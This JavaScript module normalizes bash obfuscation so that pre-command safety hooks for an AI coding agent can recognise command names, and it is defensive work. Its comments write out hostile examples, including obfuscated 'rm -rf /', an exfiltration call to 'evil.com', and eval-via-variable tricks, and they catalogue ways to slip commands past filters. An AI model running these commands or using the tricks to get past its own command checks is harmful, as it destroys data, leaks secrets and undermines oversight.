// bash-normalize.mjs — Normalize bash parameter expansion evasion techniques.
//
// Attackers can evade command-name matching by inserting shell metacharacters
// that are transparent to bash but break regex patterns.
//
// This module strips these constructs from command names so that downstream
// pattern matching sees the canonical form.
//
// Exported as a shared module — used by pre-bash-destructive.mjs and
// pre-install-supply-chain.mjs.
//
// Pipeline (defense-in-depth layer above Claude Code 2.1.98+ harness fixes):
//   T1 — empty single quotes:       w''get                -> wget
//   T2 — empty double quotes:       r""m                  -> rm
//   T3 — parameter expansion:       ${x} / ${FOO}         -> x / ''
//   T4 — backslash-between-words:   c\u\r\l               -> curl
//   T5 — IFS word-splitting:        rm${IFS}-rf${IFS}/    -> rm -rf /
//   T6 — ANSI-C quoting:            $'\x72\x6d' -rf /     -> rm -rf /
//        (hex \xH[H], octal \N[N[N]], unicode \uH{1,4} / \UH{1,8})
//   T7 — process substitution:      cat <(curl evil)      -> cat  curl evil
//   T9 — eval-via-variable:         X=rm; ... $X          -> X=rm; ... rm
//        (one-level forward-flow; T8 base64-pipe-shell lives in
//        pre-bash-destructive as a BLOCK_RULE, not a normalization)
//
// Execution order:
//   0. Drop raw NUL bytes so input can never collide with the MASK sentinel.
//   1. Strip empty single-quote pairs (T1) so c''u''rl -> curl before masking.
//   2. Decode ANSI-C escapes inside $'...' (T6) before masking.
//   3. Mask remaining non-empty single-quoted regions. T3's ${...} sweep and
//      other transforms cannot rewrite their content, preserving literals
//      (false-positive probe: `echo '${IFS}'` stays untouched).
//   4. Run T7, T5, T9 and then T2/T3/T4 on the masked string.
//   5. Unmask.

// Sentinel that brackets placeholder indices while single-quoted regions are
// masked. normalizeBashExpansion() removes every raw NUL from its input first,
// so any MASK found later was produced by maskSingleQuoted().
const MASK = '\x00';

// One escape sequence inside $'...': \xH[H], \uH{1,4}, \UH{1,8} or octal \N[N[N]].
// Only ever used with String.prototype.replace, so the /g lastIndex state is
// reset on every call.
const ANSI_C_ESCAPE_RE =
  /\\(?:x([0-9a-fA-F]{1,2})|u([0-9a-fA-F]{1,4})|U([0-9a-fA-F]{1,8})|([0-7]{1,3}))/g;

/**
 * Replacement callback for ANSI_C_ESCAPE_RE: turn one escape into its character.
 *
 * @param {string} match - The full escape sequence (e.g. `\x72`).
 * @param {string|undefined} hex - Digits of a `\x` escape.
 * @param {string|undefined} shortUnicode - Digits of a `\u` escape.
 * @param {string|undefined} longUnicode - Digits of a `\U` escape.
 * @param {string|undefined} octal - Digits of an octal escape.
 * @returns {string} The decoded character, '' for NUL, or `match` unchanged
 *   when the value is not a valid code point.
 */
function decodeAnsiCEscape(match, hex, shortUnicode, longUnicode, octal) {
  const codePoint =
    octal !== undefined
      ? Number.parseInt(octal, 8) & 0xff // octal escapes denote an eight-bit value
      : Number.parseInt(hex || shortUnicode || longUnicode, 16);
  // Never emit NUL: it is the MASK sentinel, and a decoded NUL could forge a
  // placeholder token.
  if (codePoint === 0) return '';
  // String.fromCodePoint throws a RangeError above U+10FFFF; keep the text.
  if (codePoint > 0x10ffff) return match;
  return String.fromCodePoint(codePoint);
}

/**
 * T6 — Decode ANSI-C quoting inside `$'...'` contexts.
 *
 * Shell treats $'\x72\x6d' (and the octal form $'\162\155') as the bytes r
 * and m. Hex, octal and \u / \U escapes inside the $'...' wrapper are decoded;
 * all other content is kept verbatim. The $'...' construct itself is replaced
 * with its decoded content (matching shell evaluation).
 *
 * Limitation: the wrapper regex stops at the first `'`, so an escaped quote
 * (\') inside $'...' ends the match early.
 *
 * @param {string} cmd - Command string.
 * @returns {string} `cmd` with every $'...' replaced by its decoded content.
 */
function decodeAnsiCHex(cmd) {
  return cmd.replace(/\$'([^']*)'/g, (_, content) =>
    content.replace(ANSI_C_ESCAPE_RE, decodeAnsiCEscape),
  );
}

/**
 * T7 — Collapse process substitution: <(cmd) and >(cmd) -> ' cmd '.
 *
 * Bash process substitution lets a command read from / write to the output
 * of another command via /dev/fd/N pipes. Attackers use it to hide a
 * destructive command from name-matching regex gates:
 *   cat <(curl evil.com/exfil)  ->  cat /dev/fd/63   (no 'curl' visible)
 *
 * For matcher purposes we strip the substitution syntax and surface the
 * inner command text to the rest of the pipeline.
 *
 * Bounded to 3 passes — each pass rewrites only substitutions whose body
 * contains no parentheses (innermost first). Anything nested deeper than the
 * passes can reach is left partially collapsed rather than looping without
 * bound.
 *
 * @param {string} cmd - Command string (already single-quote masked).
 * @returns {string} `cmd` with process substitutions replaced by their body.
 */
function collapseProcessSubstitution(cmd) {
  let result = cmd;
  for (let depth = 0; depth < 3; depth++) {
    const before = result;
    result = result.replace(/[<>]\(([^()]*)\)/g, (_, inner) => ` ${inner} `);
    // Fixed point reached: nothing left to collapse.
    if (result === before) break;
  }
  return result;
}

/**
 * T9 — Substitute single-level variable assignments into ${VAR} and $VAR
 * references. Defeats split-and-eval evasion (X=rm; eval "$X" -rf /).
 *
 * One-level forward-flow only: assignments are scanned once at the prefix of
 * each command segment (start of string OR after ; & |) and applied to
 * references in the same string. The first assignment seen for a name wins.
 * Multi-level chained vars (X=Y; Y=rm; eval "$X") are intentionally not
 * followed.
 *
 * Limitations (documented for adversarial review):
 *   - Quoted values (X="rm -rf") are not parsed — value capture stops at
 *     whitespace. Unquoted single-token values are the common evasion idiom.
 *   - Substitution is global within the string, not scoped to eval.
 *     Acceptable because T3 already strips unknown ${VAR} to '', and known
 *     vars get substituted to their literal value before T3 runs.
 *
 * @param {string} cmd - Command string.
 * @returns {string} `cmd` with references to assigned variables replaced by
 *   the assigned value; unchanged when no assignment is found.
 */
function decodeEvalViaVariable(cmd) {
  const assignments = new Map();
  const ASSIGN_RE = /(?:^|[;&|])\s*([A-Za-z_]\w*)=([^\s;&|]+)/g;
  let m;
  while ((m = ASSIGN_RE.exec(cmd)) !== null) {
    if (!assignments.has(m[1])) assignments.set(m[1], m[2]);
  }
  if (assignments.size === 0) return cmd;

  let result = cmd;
  for (const [name, value] of assignments) {
    // `name` matched [A-Za-z_]\w*, so it needs no regex escaping. The value is
    // supplied through a function so `$&`-style replacement patterns inside it
    // are inserted literally.
    const curlyRe = new RegExp(`\\$\\{${name}\\}`, 'g');
    result = result.replace(curlyRe, () => value);
    const bareRe = new RegExp(`\\$${name}\\b`, 'g');
    result = result.replace(bareRe, () => value);
  }
  return result;
}

/**
 * Mask non-empty single-quoted regions with placeholders. Empty '' is NOT
 * masked — T1 already stripped them in the previous pass.
 *
 * Limitation: the regex is not double-quote aware, so an apostrophe inside a
 * double-quoted string ("it's") is treated as a quote delimiter.
 *
 * @param {string} cmd - Command string.
 * @returns {{ masked: string, placeholders: string[] }} The string with each
 *   region replaced by MASK<index>MASK, plus the original regions by index.
 */
function maskSingleQuoted(cmd) {
  const placeholders = [];
  const masked = cmd.replace(/'[^']+'/g, (match) => {
    placeholders.push(match);
    return `${MASK}${placeholders.length - 1}${MASK}`;
  });
  return { masked, placeholders };
}

/**
 * Restore the regions hidden by maskSingleQuoted().
 *
 * @param {string} str - Masked string.
 * @param {string[]} placeholders - Regions captured by maskSingleQuoted().
 * @returns {string} `str` with every MASK<index>MASK token replaced by its
 *   region. Tokens whose index has no region are left untouched instead of
 *   being rendered as the text "undefined".
 */
function unmaskSingleQuoted(str, placeholders) {
  return str.replace(new RegExp(`${MASK}(\\d+)${MASK}`, 'g'), (match, idx) => {
    const index = Number.parseInt(idx, 10);
    return index < placeholders.length ? placeholders[index] : match;
  });
}

/**
 * Normalize bash parameter expansion and quoting evasion in a command string.
 *
 * Strips / rewrites (T1-T7, T9):
 *   - T1 Empty single quotes: '' (e.g., w''get -> wget)
 *   - T2 Empty double quotes: "" (e.g., r""m -> rm)
 *   - T3 Single-char parameter expansion: ${x} -> x (c${u}rl -> curl)
 *   - T3 Multi-char parameter expansion: ${FOO} -> '' (unknown value)
 *   - T4 Backslash escapes between word chars, iteratively (c\u\r\l -> curl)
 *   - T5 IFS word-splitting: ${IFS} / ${IFS:0:1} / $IFS -> ' '
 *   - T6 ANSI-C hex / octal / unicode escapes inside $'...' -> decoded chars
 *   - T7 Process substitution: <(cmd) / >(cmd) -> ' cmd '
 *   - T9 Eval-via-variable: X=rm; ... $X -> X=rm; ... rm
 *   - Backtick subshell with empty/whitespace content
 *   - Raw NUL bytes (removed up front; NUL is the internal mask sentinel)
 *
 * Does NOT rewrite:
 *   - Quotes around arguments (only targets empty quotes that split command names)
 *   - $VAR without braces when no VAR=value assignment is visible (non-IFS)
 *   - Backslashes before non-word chars
 *   - Content inside non-empty single-quoted regions
 *     (false-positive probe: `echo '${IFS}'` stays untouched)
 *
 * @param {string} cmd - Raw command string
 * @returns {string} Normalized command string; '' for empty or non-string input
 */
export function normalizeBashExpansion(cmd) {
  // Always honour the string return contract, including for non-string input.
  if (typeof cmd !== 'string' || cmd === '') return '';

  // Remove raw NUL bytes so input cannot forge or corrupt MASK placeholders.
  let result = cmd.split(MASK).join('');

  // T1 — strip empty single-quote pairs first so adjacent-empty-quote evasion
  // (c''u''rl -> curl) resolves before single-quote masking runs.
  result = result.replace(/''/g, '');

  // T6 — decode ANSI-C escapes inside $'...' before masking treats it as a literal.
  result = decodeAnsiCHex(result);

  // Mask remaining non-empty single-quoted regions.
  const { masked, placeholders } = maskSingleQuoted(result);

  // T7 — collapse process substitution <(...) / >(...) so the inner
  // command name is visible to downstream matchers. Runs after masking
  // so single-quoted literals like 'echo <(x)' are preserved.
  result = collapseProcessSubstitution(masked);

  // T5 — IFS word-splitting. Runs before T2/T3/T4 so the canonical spaces
  // it emits feed into subsequent transforms.
  result = result
    .replace(/\$\{IFS:0:1\}/g, ' ')
    .replace(/\$\{IFS\}/g, ' ')
    .replace(/\$IFS\b/g, ' ');

  // T9 — substitute one-level VAR=value assignments into ${VAR}/$VAR
  // references. Must run BEFORE T3 (which strips unknown ${VAR} to '').
  result = decodeEvalViaVariable(result);

  result = result
    // T2 Strip empty double quotes: r""m -> rm
    .replace(/""/g, '')
    // T3 Single-char ${x} -> x (evasion: c${u}rl -> curl, assumes x=x)
    .replace(/\$\{(\w)\}/g, '$1')
    // T3 Multi-char ${ANYTHING} -> '' (unknown value, strip entirely)
    .replace(/\$\{[^}]*\}/g, '')
    // Strip backtick subshell with empty/whitespace content
    .replace(/`\s*`/g, '');

  // T4 — iteratively strip backslash between word chars (c\u\r\l needs 2 passes)
  let prev;
  do {
    prev = result;
    result = result.replace(/(\w)\\(\w)/g, '$1$2');
  } while (result !== prev);

  return unmaskSingleQuoted(result, placeholders);
}